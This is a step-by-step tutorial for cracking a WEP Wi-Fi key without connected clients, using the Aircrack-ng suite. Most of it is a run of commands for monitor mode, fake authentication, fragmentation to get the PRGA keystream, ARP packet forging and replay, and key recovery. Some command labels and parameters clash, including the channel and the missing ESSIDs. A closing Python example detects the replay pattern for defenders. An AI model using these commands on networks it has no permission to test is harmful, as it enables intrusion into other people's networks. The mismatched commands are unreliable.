Before explaining how to crack WEP without clients, I assume you have a network card from this list and the injection drivers installed (Kali is fully patched). If you have doubts, check our tutorial: How to install Packet Injection Drivers on Linux!

After the drivers are installed, we must test that everything is OK and that we are close enough to the Access Point (AP) to transmit packets to it. Follow this tutorial: How to test packet injection!

Read: What to do before attacking a Wifi Network




  • 1 Access Point
  • 1 Laptop
  • 1 Alfa Card
  • 2 Neurons


All tools in this tutorial come from the Aircrack-ng framework:

  • Airmon-ng
  • Airodump-ng
  • packetforge-ng
  • Aircrack-ng

Network Details

ESSID: WifiSec


Channel: 7

Monitor Interface: mon0

MAC Wifi card:

How does it work?

Cracking WEP is easy, but we have to keep in mind the real-world requirements and limitations we have to deal with. In this tutorial I will try to explain how to crack WEP without clients using fragmentation, fake authentication and ARP request replay attacks. For the curious, I recommend reading these two tutorials first: Conditions to crack a Wifi password, How WEP Works and WEP Attacks.

Let's start with the theory. First we must put our network card into monitor mode to sniff packets from the air. Then we must fake the authentication with the AP in order to obtain the PRGA key when applying the fragmentation attack. With the PRGA key in hand, we create an ARP packet and inject it, then we start collecting unique IVs. Once all packets are collected, we crack them to extract the password.


  • Proximity with AP
  • The AP filters client MAC addresses
  • The AP isn't generating data packets
  • If it fails, use the Chopchop attack or interactive frame selection

Crack WEP without clients

Put the interface into monitor mode:

airmon-ng start wlan0 7

Fake authentication attack

aireplay-ng -1 0 -e -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Keep the connection to the AP alive

aireplay-ng -1 6000 -o 1 -q 10 -e Wifisec -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Create the packet with the PRGA key

aireplay-ng -5 -b 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 mon0

Inject the packet with the PRGA key

packetforge-ng -0 -a 9C:97:26:D7:94:71 -h 00:C0:4C:6B:FF:76 -k -l -y *.xor -w arp-request

Start capturing the data and write it to a file

airodump-ng -c 9 --bssid 9C:97:26:D7:94:71 -w capturedata mon0

aireplay-ng -2 -r arp-request mon0

aircrack-ng -b 9C:97:26:D7:94:71  capture*.cap
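
Seen from the defender's side, the replay stage above stands out on the air: the same encrypted ARP request is re-sent unchanged, so one transmitter repeats one WEP IV at a high rate, while a normal station changes the IV on every frame. The following is an added example, not part of the original tutorial, that flags this pattern in frame metadata; the record layout, thresholds, MAC addresses and sample frames are constructed for illustration.

```python
from collections import defaultdict, deque


def make_sample():
    """Constructed sensor records: (timestamp_s, transmitter_mac, iv_hex, frame_len)."""
    frames = []
    # Normal station: a fresh IV on every WEP data frame.
    for i in range(40):
        frames.append((i * 0.05, "02:00:00:00:00:01", f"{0x1000 + i:06x}", 120 + i % 7))
    # Replay pattern: one frame re-sent unchanged, so IV and length never vary.
    for i in range(200):
        frames.append((1.0 + i * 0.002, "02:00:00:00:00:02", "3fa2c1", 68))
    return sorted(frames)


def detect_iv_replay(frames, window_s=1.0, threshold=50):
    """Return {(mac, iv): peak_count} for pairs seen >= threshold times
    inside any sliding window of window_s seconds."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, mac, iv, _length in frames:
        q = recent[(mac, iv)]
        q.append(ts)
        # Drop sightings that have fallen out of the window.
        while ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold:
            alerts[(mac, iv)] = max(alerts.get((mac, iv), 0), len(q))
    return alerts


def unique_iv_ratio(frames, mac):
    """Share of distinct IVs among a transmitter's frames (close to 1.0 is healthy)."""
    ivs = [iv for _, m, iv, _ in frames if m == mac]
    return len(set(ivs)) / len(ivs) if ivs else 1.0


if __name__ == "__main__":
    sample = make_sample()
    for (mac, iv), count in detect_iv_replay(sample).items():
        ratio = unique_iv_ratio(sample, mac)
        print(f"ALERT {mac} repeated IV {iv} {count}x in 1s (unique-IV ratio {ratio:.3f})")
```

An alert of this kind on a WEP network is a signal to move the network to WPA2 or WPA3, since WEP has no replay protection to enable.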
